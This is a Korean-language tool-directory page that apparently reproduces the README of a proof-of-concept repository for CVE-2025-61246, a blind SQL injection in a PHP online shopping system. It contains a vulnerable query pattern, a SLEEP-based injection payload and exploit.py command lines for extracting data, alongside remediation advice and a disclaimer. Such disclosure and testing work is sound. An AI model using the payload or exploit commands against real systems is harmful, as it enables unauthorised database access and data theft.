Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-61246 — CVE-2025-61246: PHP 온라인 쇼핑 시스템의 SQL Injection 취약점 PoC | Kitploit
도구/GitHubGitHub/hackergovind/cve-2025-61246
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubhackergovind/cve-2025-61246

CVE-2025-61246

CVE-2025-61246: PHP 온라인 쇼핑 시스템의 SQL Injection 취약점 PoC

저장소 보기
7개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-61246 - 온라인 쇼핑 시스템의 SQL 인젝션 취약점

CVE Severity CVSS

개요

이 저장소는 Online Shopping System PHP 애플리케이션에서 발견된 치명적인 SQL 인젝션 취약점인 CVE-2025-61246에 대한 개념 증명(PoC)을 포함합니다. 이 취약점은 인증되지 않은 공격자가 시간 기반 블라인드 SQL 인젝션을 통해 임의의 SQL 명령을 실행할 수 있게 합니다.

취약점 세부 정보

  • CVE ID: CVE-2025-61246
  • 취약점 유형: SQL 인젝션(시간 기반 블라인드)
  • 영향을 받는 구성 요소: /online-shopping-system-php-master/review_action.php
  • 영향을 받는 버전: 1.0
  • 취약한 매개변수: proId
  • 공격 경로: 네트워크 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • 심각도: 치명적(CVSS 점수: 9.8)
  • 발견자: Govind Pratap Singh

기술적 설명

이 취약점은 review_action.php 엔드포인트에 존재하며, proId 매개변수의 사용자 입력이 적절한 검증이나 매개변수화된 쿼리 없이 SQL 쿼리에 직접 포함됩니다. 이를 통해 공격자는 다음과 같은 악의적인 SQL 페이로드를 주입할 수 있습니다:

  • 민감한 데이터베이스 정보 추출
  • 인증 메커니즘 우회
  • 데이터베이스 레코드 수정 또는 삭제
  • 관리 작업 실행

취약한 코드 패턴

root@kitploit:~
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);

공격 경로

공격자는 다음 방법으로 이 취약점을 악용할 수 있습니다:

  1. /online-shopping-system-php-master/review_action.php로 조작된 POST 요청 전송
  2. proId 매개변수에 악의적인 SQL 페이로드 포함
  3. 시간 기반 블라인드 SQL 인젝션 기법을 사용하여 데이터 추출
  4. 취약점을 활용하여 데이터베이스에 대한 무단 액세스 권한 획득

예시 페이로드

root@kitploit:~
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -

개념 증명 (PoC)

이 저장소는 다음을 포함합니다:

  1. 자동 공격 스크립트 (exploit.py) - 취약점을 탐지하고 악용하는 Python 스크립트
  2. 수동 테스트 가이드 (MANUAL_TESTING.md) - 수동 악용을 위한 단계별 지침
  3. 취약한 애플리케이션 설정 (docker-compose.yml) - 안전한 테스트를 위한 Docker 환경
  4. 수정 가이드 (REMEDIATION.md) - 보안 코딩 관행 및 패치

설치 및 사용

사전 요구 사항

root@kitploit:~
Python 3.7+
pip install -r requirements.txt

빠른 시작

root@kitploit:~
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php

고급 사용법

root@kitploit:~
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only

# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db

# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080

영향

이 취약점을 성공적으로 악용하면 다음과 같은 결과가 발생할 수 있습니다:

  • 데이터 유출: 민감한 사용자 정보, 자격 증명 및 결제 데이터 추출
  • 인증 우회: 관리 기능에 대한 무단 액세스
  • 데이터 변조: 중요 데이터베이스 레코드의 수정 또는 삭제
  • 전체 시스템 장악: 특정 구성에서 원격 코드 실행 가능성

수정 방법

즉시 조치

  1. 입력 검증 적용: 모든 사용자 제공 데이터에 대한 엄격한 입력 검증 구현
  2. 매개변수화된 쿼리 사용: 동적 SQL을 Prepared Statement로 교체
  3. WAF 규칙 구현: SQL 인젝션 시도를 차단하기 위한 웹 애플리케이션 방화벽(WAF) 규칙 배포
  4. 애플리케이션 업데이트: 최신 보안 패치 적용

안전한 코드 예시

root@kitploit:~
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();

자세한 수정 단계는 REMEDIATION.md를 참조하세요.

참고 자료

  • OWASP SQL Injection
  • CWE-89: SQL Injection

면책 조항

⚠️ 중요: 본 PoC는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다. 작성자는 이 정보의 오용에 대한 책임을 지지 않습니다. 테스트 전에 항상 적절한 승인을 받으십시오.

작성자

Govind Pratap Singh

  • GitHub: @hackergovind
  • Email: [email protected]
  • Medium: https://medium.com/@govindsinghpratap123

라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.

감사의 말

  • MITRE CVE 배정 팀
  • OWASP 재단
  • 보안 연구 커뮤니티

책임 있는 공개: 보안 취약점을 발견한 경우 공개적으로 공개하기 전에 해당 공급업체에 책임 있게 신고해 주십시오.

도구 다운로드